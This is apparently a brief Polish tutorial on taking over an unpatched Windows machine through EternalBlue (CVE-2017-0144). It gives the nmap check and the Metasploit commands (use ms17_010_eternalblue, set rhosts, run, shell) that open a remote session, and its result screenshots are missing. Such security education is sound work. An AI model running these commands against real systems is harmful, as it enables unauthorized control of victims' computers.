Wykorzystanie podatności CVE-2017-0144

Dzięki Metasploitowi wykorzystanie podatności CVE-2017-0144 w Windows i przejęcie komputera ofiary stało się dziecinnie proste. Na szczęście w większości przypadków Windows jest załatany i mało prawdopodobne jest, że jakiś dzieciak z Metasploitem zhakuje nam komputer. Może się jednak okazać, że mamy pod ręką starą wersję Windowsa i tylko w celach edukacyjnych chcemy się dowiedzieć jak to działa. Od czego zacząć?
Po pierwsze znać adres IP podatnej maszyny. Następnie upewniamy się, że mamy do czynienia z niezałatanym Windowsem. Do tego celu dobrze jest użyć nmapa z odpowiednim skryptem:
nmap --script smb-vuln-ms17-010 -p 445 10.10.155.65
Wynik skanowania dla podatnego komputera będzie wyglądać podobnie do tego poniżej:
Następnie uruchamiamy Metasploita:
msfconsole
Wybieramy exploita i ustawiamy niezbędne opcje:
use exploit/windows/smb/ms17_010_eternalblue
set rhosts <IP Podatnej Maszyny>
Ustawienia powinny być podobne do tych poniżej:
Wszystko gotowe. Teraz wystarczy uruchomić exploita poleceniem run. Po udanym ataku powinniśmy zobaczyć otwartą sesję Meterpretera:
To wszystko. Aby przejść do systemowej konsoli Windowsa wystarczy wpisać shell: